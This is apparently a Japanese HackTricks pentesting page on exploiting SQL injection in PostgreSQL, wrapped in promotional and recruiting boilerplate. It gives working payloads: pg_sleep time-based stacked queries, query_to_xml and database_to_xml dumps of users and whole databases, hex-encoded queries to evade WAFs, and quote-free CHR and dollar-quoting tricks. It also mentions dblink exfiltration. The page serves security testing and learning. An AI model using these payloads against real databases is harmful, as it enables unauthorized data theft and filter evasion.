| .. | ||
| big-binary-files-upload-postgresql.md | ||
| dblink-lo_import-data-exfiltration.md | ||
| network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md | ||
| pl-pgsql-password-bruteforce.md | ||
| rce-with-postgresql-extensions.md | ||
| rce-with-postgresql-languages.md | ||
| README.md | ||
PostgreSQLインジェクション
htARTE(HackTricks AWS Red Team Expert) でAWSハッキングをゼロからヒーローまで学ぶ!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksスワッグを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションを見る
- **💬 Discordグループ**に参加するか、telegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
- HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
もし ハッキングキャリア に興味があり、 解読不能なものをハックしたい - 採用中です!(流暢なポーランド語の読み書きが必要です)。
{% embed url="https://www.stmcyber.com/careers" %}
このページは、postgresqlデータベースで見つかったSQLインジェクションを悪用するための異なるトリックを説明し、 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md で見つけることができるトリックを補完することを目的としています。
ネットワークインタラクション - 特権昇格、ポートスキャナー、NTLMチャレンジレスポンスの開示とエクスフィルトレーション
PostgreSQLモジュール dblink は、他のPostgreSQLインスタンスに接続してTCP接続を実行する機能を提供します。これらの機能は、COPY FROM機能と組み合わせることで、特権昇格、ポートスキャン、NTLMチャレンジレスポンスの取得などのアクションを可能にします。これらの攻撃を実行する詳細な方法については、これらの攻撃を実行する方法を確認してください。
dblinkと大規模オブジェクトを使用したエクスフィルトレーションの例
CTFの例を見るために、この例 を読んで、大規模オブジェクト内にデータをロードし、その後dblink_connect関数のユーザー名内の大規模オブジェクトの内容をエクスフィルトレートする方法を見てください。
PostgreSQL攻撃:読み書き、RCE、特権昇格
PostgreSQLからホストを侵害し、特権を昇格させる方法については、以下をチェックしてください:
{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}
WAFバイパス
PostgreSQL文字列関数
文字列を操作することで、WAFをバイパスしたり、他の制限を回避するのに役立つ場合があります。
このページ でいくつかの便利な文字列関数を見つけることができます。
スタックされたクエリ
PostgreSQLはスタックされたクエリをサポートしていますが、1つのレスポンスが期待されているときに2つのレスポンスが返されると、いくつかのアプリケーションはエラーをスローする可能性があります。しかし、タイムインジェクションを介してスタックされたクエリを悪用することはできます:
id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
XMLトリック
query_to_xml
この関数は、1つのファイルでXML形式のすべてのデータを返します。1行に大量のデータをダンプしたい場合に最適です。
SELECT query_to_xml('select * from pg_user',true,true,'');
database_to_xml
この関数は、データベース全体をXML形式で1行にダンプします(データベースが非常に大きい場合は、DoS攻撃を引き起こす可能性があるため注意してください)。
SELECT database_to_xml(true,true,'');
16進数の文字列
もしクエリを文字列内で実行できる場合(たとえば**query_to_xml関数を使用する場合)。convert_fromを使用して文字列を16進数として渡すことで、フィルタをバイパスすることができます。**
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');
# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h
# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -
{% endcode %}
禁止された引用符
引用符を使用できない場合は、基本的な句をCHRでバイパスすることができます(文字連結はSELECT、INSERT、DELETEなどの基本的なクエリにのみ適用され、すべてのSQLステートメントには適用されません):
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
または$を使用しても同じ結果が返されます:
SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
ハッキングキャリアに興味がある方や、解読不能なものをハックしたい方向けに、採用中です!(流暢なポーランド語の読み書きが必要です)。
{% embed url="https://www.stmcyber.com/careers" %}
htARTE(HackTricks AWS Red Team Expert)で、**ゼロからヒーローまでのAWSハッキングを学ぼう**!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したい場合や、HackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksスワッグを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションを見る
- 💬 Discordグループやtelegramグループに参加したり、Twitter 🐦 @carlospolopmをフォローする
- HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する